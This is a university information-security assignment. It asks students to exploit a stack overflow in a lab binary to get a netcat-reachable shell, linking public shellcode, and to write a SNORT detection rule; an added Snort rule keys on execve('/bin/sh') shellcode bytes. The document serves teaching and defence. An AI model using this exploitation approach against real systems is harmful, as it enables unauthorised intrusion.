IT Security Attacking Virtual Machine Project
CSI 5480 – Information Security Practice
Project 3 (Prj3)
Connects to the following learning outcomes:
Footprinting, scanning, and enumeration; common system vulnerabilities; system remediation and
hardening; intrusion detection; hands-on experiments on information security.
Grade Weight: 6%
Due date: December 5th, at 23:59:59 PM.
Task Description
The challenge is to analyze, ethically exploit, and mitigate a stack overflow in a target executable.
Please follow the steps below to deploy the required files in your testbed and ethically develop the
exploit:
1) Decompress the archive Project3.zip. The files in that archive are the following:
a) stats, an ELF 64-bit LSB executable
b) stats.txt, a text file that is used to store statistical data
c) stats.c, the source code for the stats executable
2) Place the files stats and stats.txt on the Virtual Machine under the path “/usr/ctf/museum/html/cgi-bin”. You can use sftp to upload those files onto the Virtual Machine.
3) Run the target executable stats on the Virtual Machine, and ethically exploit it over the virtual
network from the physical machine. Figuring out the port that stats listens on is part of the footprinting
and scanning challenge, so no information is given here at this time.
Students can use the publicly available shellcode from shell storm:
http://shell-storm.org/shellcode/files/shellcode-858.php
The shellcode is the byte sequence published on that page.
Do not forget to replace PORT with the two bytes that represent the port that you chose to connect to
and get a shell on the compromised machine. Once you inject the shellcode and execute it on the virtual
machine, you need to use netcat to connect to it on the port in question, and that is how you get the
shell.
The deliverable is an exploit that interacts with the target executable stats so as to inject code into its memory and corrupt addresses so that the injected code is executed. The injected code should run a shell on the compromised machine.
As a mitigation, develop a SNORT rule that can detect your exploit without false positives.
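The following Snort 2 rule is an added illustration of the shape such a signature can take; it is not the course's reference rule. It assumes the stats service port has already been found (STATS_PORT is a placeholder to substitute) and keys on two markers common to x86-64 execve("/bin/sh") shellcode rather than on any one byte string, which is what keeps the false-positive rate low.

```snort
# Added example (not part of the assignment). Snort 2 syntax: one rule per line,
# comments only between rules. STATS_PORT is a placeholder for the port that the
# stats executable was found to listen on during scanning.
#
# Marker 1: the string "/bin/sh" that any execve("/bin/sh") shellcode must carry.
# Marker 2: "push 59 ; pop rax ; syscall" (|6a 3b 58 0f 05|), the usual way
#           x86-64 shellcode invokes execve (syscall number 59).
# Requiring marker 2 to follow marker 1 within 64 bytes, inbound to the service,
# on an established flow, avoids alerting on ordinary requests that merely
# mention /bin/sh or contain a stray syscall instruction.
alert tcp $EXTERNAL_NET any -> $HOME_NET STATS_PORT (msg:"PRJ3 stats - inbound x86-64 execve /bin/sh shellcode"; flow:to_server,established; content:"/bin/sh"; content:"|6a 3b 58 0f 05|"; fast_pattern; distance:0; within:64; classtype:shellcode-detect; sid:1000001; rev:1;)
```

Validate it offline against a capture of your own test traffic (for example `snort -c snort.conf -r prj3.pcap -A console`) and confirm it stays silent on a capture of legitimate requests to the same port.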
Final considerations:
1) There is a mechanism in place to protect the saved instruction pointer, i.e., the return address, from corruption.
2) The stack may not be your only friend!
Good luck to you!
Grading Rubric
The following rubric details how your submission will be graded:

Accomplishment                                                      Points
Correct exploit with correct SNORT signature.                       6
Correct exploit but no working SNORT signature.                     4
Partially correct exploit with correct SNORT signature.             3
Partially correct exploit with partially correct SNORT signature.   2
Incorrect or no exploit.                                            0